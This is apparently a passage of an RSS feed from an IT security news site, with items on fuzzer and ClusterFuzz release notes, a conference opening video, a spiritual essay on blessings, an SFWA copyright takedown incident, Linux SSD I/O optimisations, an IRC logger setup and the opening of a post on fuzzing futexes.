<li>IJON fix to search for the necessary include</li>
<li>Allow compiling the gcc plugin with clang++, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/exoosh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/exoosh">@exoosh</a></li>
<li>Fix for unusual bit sizes in cmplog-instructions-pass by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forzafedor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forzafedor">@forzafedor</a></li>
</ul>
</li>
<li>qemu_mode:
<ul>
<li>IJON support, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nj00001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nj00001">@nj00001</a>! see qemu_mode/README.md</li>
<li>leaner, less warnings, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McSinyx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McSinyx">@McSinyx</a>!</li>
</ul>
</li>
<li>afl-tmin
<ul>
<li>fix custom trimmings, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/renatahodovan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/renatahodovan">@renatahodovan</a>!</li>
</ul>
</li>
<li>custom mutators:
<ul>
<li>Gramatron: fixes + cjson switch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CarvedCoder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CarvedCoder">@CarvedCoder</a>, fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jubnzv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jubnzv">@jubnzv</a></li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.29.0]]></title>
<description><![CDATA[What's Changed

Add Fuzzer.created_at field by @dylanjew in #5227
Swarming: Removes Unnecessary DB calls by @IvanBM18 in #5223
Add local butler script to upload a fuzzer to clusterfuzz by @dylanjew in #5236
Fix duplicate proto copyright generation by @dylanjew in #5241
Add test for utask_main Fuz...]]></description>
<link>https://tsecurity.de/de/3501303/it-security-tools/v2290/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501303/it-security-tools/v2290/</guid>
<pubDate>Fri, 08 May 2026 23:12:43 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Add Fuzzer.created_at field by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylanjew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylanjew">@dylanjew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195633592" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5227" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5227/hovercard" href="https://github.com/google/clusterfuzz/pull/5227">#5227</a></li>
<li>Swarming: Removes Unnecessary DB calls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IvanBM18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IvanBM18">@IvanBM18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154486056" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5223" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5223/hovercard" href="https://github.com/google/clusterfuzz/pull/5223">#5223</a></li>
<li>Add local butler script to upload a fuzzer to clusterfuzz by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylanjew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylanjew">@dylanjew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217866082" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5236" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5236/hovercard" href="https://github.com/google/clusterfuzz/pull/5236">#5236</a></li>
<li>Fix duplicate proto copyright generation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylanjew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylanjew">@dylanjew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4227220620" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5241" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5241/hovercard" href="https://github.com/google/clusterfuzz/pull/5241">#5241</a></li>
<li>Add test for utask_main FuzzingSession by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylanjew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylanjew">@dylanjew</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226792936" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5240" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5240/hovercard" href="https://github.com/google/clusterfuzz/pull/5240">#5240</a></li>
<li>Add caching for the privileged group check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ViniciustCosta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ViniciustCosta">@ViniciustCosta</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232336847" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5242" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5242/hovercard" href="https://github.com/google/clusterfuzz/pull/5242">#5242</a></li>
<li>Add script to execute a fuzzing task directly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jardondiego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jardondiego">@jardondiego</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212564636" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5233" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5233/hovercard" href="https://github.com/google/clusterfuzz/pull/5233">#5233</a></li>
<li>Swarming: Calculates CF zip url in preprocess to be used in main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IvanBM18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IvanBM18">@IvanBM18</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214566266" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5235" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5235/hovercard" href="https://github.com/google/clusterfuzz/pull/5235">#5235</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylanjew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylanjew">@dylanjew</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195633592" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5227" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5227/hovercard" href="https://github.com/google/clusterfuzz/pull/5227">#5227</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google/clusterfuzz/compare/v2.28.1...v2.29.0"><tt>v2.28.1...v2.29.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FSCK 2026 - Opening]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 5x - Views:95 https://media.ccc.de/v/fsck-2026-170-opening

Feierliche Eröffnung der vierten FSCK. Alles wichtige und wissenswerte zu den nächsten paar Tagen

Nick

https://cfp.ctbk.de/fsck-2026/talk/UXDGB8/

#fsck2026

Licensed to the public under https://creati...]]></description>
<link>https://tsecurity.de/de/3501279/it-security-video/fsck-2026-opening/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501279/it-security-video/fsck-2026-opening/</guid>
<pubDate>Fri, 08 May 2026 23:10:43 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 5x - Views:95 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/y3i_T7LDgfE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/fsck-2026-170-opening<br />
<br />
Feierliche Eröffnung der vierten FSCK. Alles wichtige und wissenswerte zu den nächsten paar Tagen<br />
<br />
Nick<br />
<br />
https://cfp.ctbk.de/fsck-2026/talk/UXDGB8/<br />
<br />
#fsck2026<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Blessing Path]]></title>
<description><![CDATA[I used the following excerpt for a spiritual reflection I led for a vestry meeting. It comes from a book by William John Fitzgerald, entitled Blessings for the Fast Paced and Cyberspaced. I really liked it, so I decided to include it here.



above the mountain it rises and my heart dances.

Now ...]]></description>
<link>https://tsecurity.de/de/3501124/unix-server/the-blessing-path/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501124/unix-server/the-blessing-path/</guid>
<pubDate>Fri, 08 May 2026 23:04:19 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I used the following excerpt for a spiritual reflection I led for a vestry meeting. It comes from a book by William John Fitzgerald, entitled <strong>Blessings for the Fast Paced and Cyberspaced</strong>. I really liked it, so I decided to include it here.</p>
<blockquote>
<!-- raw HTML omitted -->
</blockquote>
<pre><code>above the mountain it rises and my heart dances.
</code></pre>
<p>Now the light comes,
the light that makes me one with all life.
Like the tinamou I am,
who sings in the dawn, who is humble with love,
Who walks in the circle of the greater love and the greater power.
– “A Song Heard in the Dawn”<!-- raw HTML omitted --></p>
<p>In their daily walking, Native Americans enter the “circle of a greater power.” And the Navaho sing and speak of walking a “blessing path.” But in our modern fast paced, cyberspace culture, we disdain “going around in circles.” We move straight forward — racing ahead frantically, never really arriving because once we think we have arrived, we realize we are behind someone, somewhere, or something else and must race faster and faster, on and on over the ever-increasing obstacles that stand in our way.</p>
<p>Native Americans of different tribes are renowned for their running. Many can run endless miles without stopping. But they don’t run all the time! Although they possess the grace and endurance of great runners, they’re not always “on the run.” Rather, Native American spirituality is intent on walking a “blessing path,” being connected to the rhythms of the earth, moon and sun. They haven’t written books about blessings, but they know intuitively what blessings are. They take time to notice. Perhaps in our ever-accelerating lives, we too need to discover the meaning of blessings. We need to take time to notice them and cultivate the ability to walk a blessing path.</p>
<!-- raw HTML omitted -->
<!-- raw HTML omitted -->
<h3>So, What are Blessings?</h3>
<p>It’s fine you might say, to consider Native American pieties, but we live in busy, fast paced communities — not out on the plains hunting buffalo. So, what are blessings for us and our time? A fair enough question! It’s difficult to be aware of blessings unless they break through our busy schedules. Sometimes on TV we see the Pope blessing people from his balcony. When the Pope makes the sign of the cross, we know it is a blessing. But we may be puzzled when we see him alight from a plane, stoop down and kiss the ground. Is that also a blessing?</p>
<p>If we reflect on blessings, many questions can come to mind. A priest praying over a religious medal is imparting a blessing. An evangelist laying on hands is definitely imparting a blessing. But what about a priest praying over a beer? What about the “aha!” of discovery, the “Wow!” of exuberance or the orgasmic moan — can these also be blessings?</p>
<p>A basketball player seems to be performing a blessing when making the sign of the cross before an important free throw. If the shooter misses, does it still count as a blessing? Are high fives blessings?</p>
<p>On rare occasions, a bishop anoints an altar table with oil, setting it aside for sacred use. We know that’s a blessing, but what about being rubbed with oil during a refreshing massage? Is that a blessing too? A baby is a “blessed event.” What about a honeymoon? Isn’t it true that the more sensual or erotic an activity, the less we might be inclined to use the word “blessing” or”holy?” But why isn’t that a blessing too?</p>
<p>How about affirmations? Is “I love you!” a blessing? Surely it is, and one of the most powerful of blessings! Do we adequately identify simple but significant words and gestures as blessings?</p>
<p>Besides invoking a blessing on someone, something, some place or some activity, we also experience being blessed. Think about the blessing of a hug from your child, a kiss from your spouse, a cool drink on a hot day, or a hot bath at the end of a long day. We can be blessed by a kind word, a friendly smile, a hug or a pat on the back.</p>
<p>And what about beauty? When we glimpse a beautiful sunset or share the peacefulness of a tranquil lake, we might exclaim, “What a blessing!” Yet, how often are we that conscious? Are we attentive to the blessings all around, or is our path through life so hectic that too many of the blessings all around are lost in a blur?</p>
<p>Perhaps we all need a graduate course in blessings. Perhaps we simply need to pay more attention to blessings close at hand. If we do, we might well develop a deeper consciousness about blessing and being blessed. This could help us develop a blessing-centered spirituality that might empower us both to give and receive blessings. When we learn to do that, we walk a blessing path.</p>
<p>But we are on the run, and if we are to reap a harvest of blessings, we need sometimes to cease our frantic pace, to stop, look and listen! When we do stop, the first logical question might be, “Well, just what are blessings really?</p>
<h3>The Meaning of Blessing</h3>
<p>The dictionary gives several definitions for the verb “to bless”: to consecrate or sanctify, to request divine favor, to bestow good of any kind, to protect or guard from evil. And to <em>be</em> blessed is to be divinely or supremely favored, according to Webster.</p>
<p>Perhaps that is the place to start when considering a spirituality of blessing. The primal blessing is God’s love overflowing, bestowing divine favor on the blessed. As Genesis assures us, in the very beginning God looked at what was created and said it was “very good!” This was the origin of each and every blessing.</p>
<h3>Attention</h3>
<p>To walk a blessing path demands attention — really looking about with a spiritual perception. It’s an attitude of reverence that is always open and alert to blessings all around. Thomas Aquinas, thirteenth century philosopher and theologian, wrote that everything is perceived through the mode (attitude) of the perceiver. His insight is still true.</p>
<h3>Finding Time</h3>
<p>In our rushed and busy lives it is quite difficult for many people to find extended times for prayer, although if we really prioritized our lives most of us could find more fruitful time than we realize. I once bought a guitar with the intent of learning to play. But it sat in the corner for months. One of my friends asked, “Have you started to play?” I responded, “I would like to but I haven’t had time.” She responded, “Oh? Do you only have a twenty three-hour day, or are you like the rest of us who have twenty-four hours? I’d guess you can find the time to do what you really value.”</p>
<p>There is certainly is one way for almost everyone to find time for prayer — a time to bless, a time to reflect, a time to speak to the Spirit of God who is all around, no matter where we are. This newfound prayer time can come in the intervals where circumstances for us to wait: at a traffic light, the doctor’s office, the checkout line… These short pauses are like cracks in a sidewalk, from which amazingly a flower may sometimes take root and bloom. These cracks in the concrete of life can become pauses in the whirlwind — providing us opportunities to bless and be blessed.</p>
<hr>
<h3>Questions to ponder</h3>
<p>What blessings have I received today?</p>
<p>When was the last time I blessed my my closest loved ones with five affirmations? Am I receiving enough affirmations? Giving enough? (Perhaps those two answers are related)</p>
<p>Am I paying attention? Do I possess a “Blessing Attitude”? If not, how can I change the way I see things?</p>
<hr>
<h3>Evening Blessing Prayer</h3>
<blockquote>
<!-- raw HTML omitted -->
</blockquote>
<pre><code>Deliver me from today's hyper-pace.
</code></pre>
<p>Blessed be stopping:
pausing along God’s way.
Blessed be being:
“Just to be is a blessing”
Blessed be simplifying:
Deliver me from polluting.
Blessed be imagination:
dreaming better dreams.
Blessed be creative expectations:
I think I can — tomorrow!
Blessed be attention:
being present to those I love.
Blessed be transformations:
tomorrow better than today.
Bless this day!  Bless this night!
Deliver us from any fright.</p>
<pre><code>                            Amen.&lt;/pre&gt;</code></pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[Whack the Gopher]]></title>
<description><![CDATA[I recently came across three very well written and very thoughtful blog postings by Rick Cook (author of the Wiz Zumwalt Wizardry series):

Copyrights, Whack-the-Gopher, and SFWA — Why I Quit
The Economics of Theft: Son of Whack the Gopher
WHACK THE GOPHER III: The Return of the Mutant Grandson

...]]></description>
<link>https://tsecurity.de/de/3501037/unix-server/whack-the-gopher/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501037/unix-server/whack-the-gopher/</guid>
<pubDate>Fri, 08 May 2026 23:02:42 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I recently came across three very well written and very thoughtful blog postings by <a href="http://heresypornographyandtreason.blogspot.com/">Rick Cook</a> (author of the <a href="http://www.jimloy.com/books/wiz.htm">Wiz Zumwalt Wizardry series</a>):</p>
<ol>
<li><a href="http://heresypornographyandtreason.blogspot.com/2007/09/copyrights-whack-gopher-and-sfwa-why-i.html">Copyrights, Whack-the-Gopher, and SFWA — Why I Quit</a></li>
<li><a href="http://heresypornographyandtreason.blogspot.com/2007/09/economics-of-theft-son-of-whack-gopher.html">The Economics of Theft: Son of Whack the Gopher</a></li>
<li><a href="http://heresypornographyandtreason.blogspot.com/2007/09/whack-gopher-iii-return-of-mutant.html">WHACK THE GOPHER III: The Return of the Mutant Grandson</a></li>
</ol>
<p>The incident which kicked off these postings was an informal DMCA takedown notice posted by the Vice President of the Science Fiction Writers of America, Dr. Andrew Burt which was created by a process only slightly more sophisticated than using word search for “Asimov” and “Silverberg”. Unfortunately, this takedown notice erroneously included a junior high school teacher’s <a href="http://www.nicksenger.com/blog/a-teachable-moment-about-copyright-from-the-sfwa">list of 300+ recommended books</a> (which naturally contained the strings “Issac Asimov” and “Robert Silverberg”, <a href="http://phywriter.com/archives/2007/08/28/sfwa-issues-misguided-rgr-takedowns-at-scribd/">an on-line published science-fiction magazine</a> that referenced the science fiction author Isaac Asimov in a review, and <a href="http://www.boingboing.net/2007/08/30/science-fiction-writ-1.html">a creative-commons licensed science fiction novel</a> which had been deliberately published on the web for free distribution, and for which the author had explicitly forbidden the SFWA from taking any action on behalf of his books.</p>
<p>The entire incident was wonderfully filled with irony — from the fact that an organization of writers who purport to write about what the future might bring given scientific and technological advances could so totally fail to get the Internet or understand that such a campaign might cause them to alienate their readers and fan base, to the the fact that <em>Doctor</em> Andrew Burt, Ph.D. is a professor in computer science at the University of Denver with a research interest in copyright and electronic piracy, could so incompetently foul up a DMCA takedown request and not understand that “grep” might result in false positives that would require human checking (“Andrew? Your alma mater is calling; they would like their degree back…”)</p>
<p>One good thing that has come out of this whole mess is that it has been, as junior high school teacher Nick Singer put it, “a teachable moment”, and an opportunity for people to reflect about issues of copyright, the rights of authors, ebooks, and the Internet. This is a hard problem; I very strongly believe that (at the same time) “Art wants to be free; Artists want to be paid” (to use a phrased coined by a friend of mine, <a href="http://www.oreillynet.com/cs/catalog/view/au/2251?x-t=book.view">Jesse Vincent</a> (blog <a href="http://obra.livejournal.com/">here</a>), to the point that I’ve been <a href="http://www.the-big-meow.com/ProjectCommitment.php">willing to put my money where my mouth is</a>. So far the solutions for achieving this are nowhere near perfect, but they are certainly better than sending out shotgun DMCA takedown requests. In any case, Rick Cook’s thoughts on the subject are a worthy contribution to the subject. He says he’s going to do one more article on his blog proposing an economic solution to this problem; I can’t wait to see what he has to say on the subject.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SSD optimizations]]></title>
<description><![CDATA[A few months ago I got my hands on a sample of the Intel X25-E SSD drives for testing purposes. There are lots of interesting things to be said about SSD vs rotational devices, but my main interest in these devices is largely that they offer a good test base for high IOPS rates testing. So yes, t...]]></description>
<link>https://tsecurity.de/de/3500990/unix-server/ssd-optimizations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500990/unix-server/ssd-optimizations/</guid>
<pubDate>Fri, 08 May 2026 23:01:22 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A few months ago I got my hands on a sample of the Intel X25-E SSD drives for testing purposes. There are lots of interesting things to be said about SSD vs rotational devices, but my main interest in these devices is largely that they offer a good test base for high IOPS rates testing. So yes, the device read/write bandwidth definitely kicks a lot of ass, in fact so much that it's the first SSD out there that I would recommend to other people. I've played with various other models in the past, even expensive ones. And while they do have nice read performance, they fall flat on their face when presented with random write workloads. Additionally, apart from the flash itself, the drive internals are really outdated - most are using SATA-I 1.5gbps link speeds, and none of them offer any kind of command queuing. What are they thinking?<br><br>Anyway, back to the topic at hand. As my initial primary goal with this device was increasing the IOPS rate of the Linux IO stack, testing was mainly done with O_DIRECT libaio. As with most of my testing, I tend to use <a href="http://git.kernel.dk/?p=fio.git;a=summary" target="_blank" rel="nofollow">fio</a> for quickly setting up a prototype workload. I wanted to use small block sizes for various reasons. This brings the IOPS rate up, thus better high lighting problem areas in Linux that would tend to be hidden more with larger block sizes. My concern with O_DIRECT and small block sizes is that get_user_pages() overhead would dominate the per-command overhead, however those concerns turned out to be completely unfounded after Nick Piggins fast path get_user_pages() patches have gone in. That is nice, since I didn't really want to spend my time optimizing the VM for this!<br><br>The first bottleneck that reared its ugly head was hpet read in the kernel. It was so large that switching to a tsc based clock source for the kernel increased the IOPS rate by over 10%. After a bit of head scratching, I started looking at how many gettimeofday() calls that fio generates for this workload - a LOT. Fio wants to tell you pretty much everything about IO latencies, both going in to the kernel, at the device end, and reaping them. This in turn generates a lot of gettimeofday() traffic. A few hacks and options were put into fio to diminish the number of gtod calls and things looked much better with the default clock source.<br><br>To step back a bit before going further, one usually has a preconceived notion of a few changes that'll speed things up before doing this type of testing. One such thing was the IO plug management in Linux. Plugging is meant to optimize the command size for the device, at the expense of a bit of latency on submission. This makes a lot of sense for rotational storage, not so much for SSD devices. Turns out that disabling plugging gains us about 1% on just this device, when doing 30k-40k IOPS.<br><br>After disabling plugging, I went further with the profiling. The top entry is (not surprising) the ahci interrupt handler. There are ways to speed it up a bit without going too far, but my goal was IO stack reduction in general, so I left it alone for now. Next on the list was slab allocations. When issuing a piece of IO in Linux, we do quite a few allocations along the way. First we allocate a bio, then we allocate a bio_vec list to fill pages into. The bio_vec allocations come from a number of slab pools, sized in powers of two (1 entry, 4, 16, 64, 128, and 256). Then a request is allocated to attach this bio to. Going into the driver layers, SCSI allocates a SCSI command and sense buffer before sending it to the device. So that's 5 allocations just for the IO request, and there can easily be more from files ystems etc. We can't get away with not allocating a bio, but we can eliminate at least some of bio_vec allocations fairly easily. Most of the IO issued in a system is fairly small, in the range of 4 - 16kb. If we embed the bio_vec into the bio for a small number of pages, we can get rid of this allocation. To take that step a bit further, I wanted to incorporate a related change that Chris Mason had previously voiced an interest in. When a file system allocates a bio, it typically allocates a private structure for information related to that piece of IO. So the patch set in full allows for a piece of memory to be reserved both at the front of the bio (for file systems) and at the end (for the bio_vec). This then combines these three allocations into one. A similar trick was done for the SCSI command, so that the sense buffer is allocated at the very end as well. Finally, I added a struct request allocation cache to avoid going into the memory allocator there as well. The end result is that we gained 3-4% for this workload.<br><br>Another entry that was high in the profile list was lookup_ioctx(). This is what finds the kernel aio context for a given process when that process does an aio io_submit() to submit a piece of IO. When I read the kernel implementation, several red lights whent off in my head. The lookup was a doubly linked list, guarded by a read/write spinlock. While the O(n) choice of a linked list may seem problematic, there's usually only a single entry on this list since processes generally do not set up a lot of IO contexts to submit IO against. But experience tells me that reader/write locks are usually trouble, as they are much slower than a normal spinlock. Personally I think the use of them is usually a design mistake and that it would be better if we removed them from the kernel! The list management in aio was opencoded, so I converted that to a hlist structure and protected it with RCU. Using RCU here makes a lot of sense, since the list is basically only manipulated when the IO context is setup or torn down - for the long duration of actually submitting IO, it's purely a reader side thing. This got us about 2% gain on even a puny 2-way system.<br><br>At this years kernel summit, I had a talk with Matthew Wilcox about a recent change to the IO accounting that Intel had found troublesome. In the 2.4 days, we had per-partition statistics on the IO request, while for 2.6 kernels we had dumped that feature. About a year ago that feature was reinstated. The partition lookup scans the kernel partition table to find the right partition to account, and if that partition number is in the higher range, we end up spending a bit of time doing this for every IO. You don't notice if you are primarily doing IO to sda1 or sda2, but if sda16 is hit a lot it starts to show. I added a one-hit cache in front of this lookup and got rid of most of that lookup time. This trick is similar to what we do for IO merging, and it works exceptionally well. The reason being that while you typically have more than one partition active for IO at any given point in time, submissions tend to come in batches. If these batches are large enough, we get a lot of hits in the one-hit cache before having to invalidate it. So this again got us a few percent of improvement for this type of scenario.<br><br>I'll stop detailing the optimizations here and save some for future blog entries, there's still lots of improvements to be made and I have lots of stuff in-progress that I hope will be very interesting. And I haven't even gotten to buffered IO yet! If you are curious about the above changes, you are encouraged to inspect the for-2.6.29 branch of my block git repo. Find that <a href="http://git.kernel.dk/?p=linux-2.6-block.git;a=shortlog;h=refs/heads/for-2.6.29" target="_blank" rel="nofollow">here</a>. In the ssd branch there are more experimental changes that will need a bit longer to mature.<br><br>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Jato IRC logger]]></title>
<description><![CDATA[Here's the recipe for the Jato IRC logger. Nothing fancy, but works surprisingly well./home/vegard/jato-irc-logger/irssi-config:settings = {       core = {               real_name = "#jato IRC logger";               user_name = "vegard";               nick = "jato-irc-logger";       };       "fe-...]]></description>
<link>https://tsecurity.de/de/3500936/unix-server/the-jato-irc-logger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500936/unix-server/the-jato-irc-logger/</guid>
<pubDate>Fri, 08 May 2026 22:59:46 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Here's the recipe for the Jato IRC logger. Nothing fancy, but works surprisingly well.<br><br><span>/home/vegard/jato-irc-logger/irssi-config</span>:<br><pre>settings = {<br>       core = {<br>               real_name = "#jato IRC logger";<br>               user_name = "vegard";<br>               nick = "jato-irc-logger";<br>       };<br><br>       "fe-text" = {<br>               actlist_sort = "refnum";<br>       };<br><br>       "fe-common/core" = {<br>               autolog = "Yes";<br>               autolog_path = "logs/$0/%Y-%m-%d.txt";<br>       };<br>};<br><br>servers = (<br>       {<br>               address = "irc.freenode.net";<br>               chatnet = "Freenode";<br>               port = "6667";<br>               autoconnect = "Yes";<br>       },<br>);<br><br>chatnets = {<br>       Freenode = {<br>               type = "IRC";<br>               autosendcmd = "/^msg nickserv identify vegard <span>password</span>";<br>       };<br>};<br><br>channels = (<br>       {<br>               name = "#jato";<br>               chatnet = "Freenode";<br>               autojoin = "Yes";<br>       },<br>);</pre><br><br><span>/home/vegard/jato-irc-logger/</span><span>screenrc</span>:<br><pre>screen irssi --config=irssi-config</pre><br><br><span>/home/vegard/jato-irc-logger/</span><span>start-logger.sh</span>:<br><pre>#! /bin/bash -e<br><br>screen -c screenrc -dmS jato-irc-logger<br></pre><br><br><span>crontab</span>:<br><pre># m h  dom mon dow   command<br>0 * * * * rsync -r -t --chmod=a+r jato-irc-logger/logs/#jato/ vegardno@<span>hostname</span>:www_docs/jato-irc-logs</pre><br><br><span>/etc/rc.local</span>:<br><pre>#!/bin/sh -e<br><br>cd /home/vegard/jato-irc-logger<br>sudo -u vegard ./start-logger.sh &amp;<br><br>exit 0</pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[fu(zz)tex: targeted fuzzing of futexes]]></title>
<description><![CDATA[The complexity of futexes, their non-trivial interactions and semantics, very much serve as a good candidate for applying fuzzy testing techniques to them. In general futex code is poorly understood and audited, both at a kernel implementation level and by the respective userland callers, normall...]]></description>
<link>https://tsecurity.de/de/3500809/unix-server/fuzztex-targeted-fuzzing-of-futexes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500809/unix-server/fuzztex-targeted-fuzzing-of-futexes/</guid>
<pubDate>Fri, 08 May 2026 22:55:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div dir="ltr" trbidi="on">
<div>
The complexity of futexes, their non-trivial interactions and semantics, very much serve as a good candidate for applying fuzzy testing techniques to them. In general futex code is poorly understood and audited, both at a kernel implementation level and by the respective userland callers, normally trying to implement some sort of locking primitive. Unsurprisingly, bugs related to this call will often be subtle and nasty, sometimes with <a href="http://www.cvedetails.com/google-search-results.php?q=futex&amp;sa=Search">security</a> implications. Specifically for futexes, all system call fuzzers use generic and completely randomized inputs, which has only limited usefulness. This is even the case for Dave Jones' <a href="http://codemonkey.org.uk/projects/trinity">trinity</a> program, which has been extremely good at finding kernel bugs (and ruining my weekends more than once ;). Much of the success and popularity of this program is because not all the inputs are random and meaningful parameters are passed for many of the exercised syscalls. This is called targeted fuzzing, and has been proven to find more bugs than blindly random inputs, which in turn is more likely to produce logic that makes the kernel actually do something related to the call, as opposed to quickly erroring out due to some trivial bogus scenario. A nice example is the <i>perf_event_open(2)</i> call, which was <a href="http://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/2015_perf_fuzzer_tr.pdf">studied</a> for targeted fuzzy testing with very good results.</div>
<h3>
Extending Trinity </h3>
<div>
Reusing the already proven-to-work machinery of trinity. and extend it for futex ad-hoc work, is the obvious step for improving coverage, in the hope to tackle some of the issues previously described. While reading the code is always the definite answer, having a man-page that is <i>up-to-par</i> with the call is quite essential; if we want programmers to make correct use of the tools we provide, that is. Fortunately, Michael Kerrisk has been doing a nice job of <a href="https://git.kernel.org/cgit/docs/man-pages/man-pages.git/tree/man2/futex.2">rewriting</a> the current <i>futex.2</i> page, which is so surprisingly crappy and incomplete, it's sad. This makes the task correctly setting the input parameters following a certain purpose a little less tedious and error-prone:<br>
<br>
<pre><span><code> </code></span><code><span>SYSCALL_DEFINE6(futex, u32 __user *, uaddr, int, op, u32, val,
     struct timespec __user *, utime, u32 __user *, uaddr2, u32, val3)</span>
</code></pre>
<span></span><br>
 -- just imagine if <i>mmap.2</i> were barely documented and stale.</div>
<div>
<br></div>
<div>
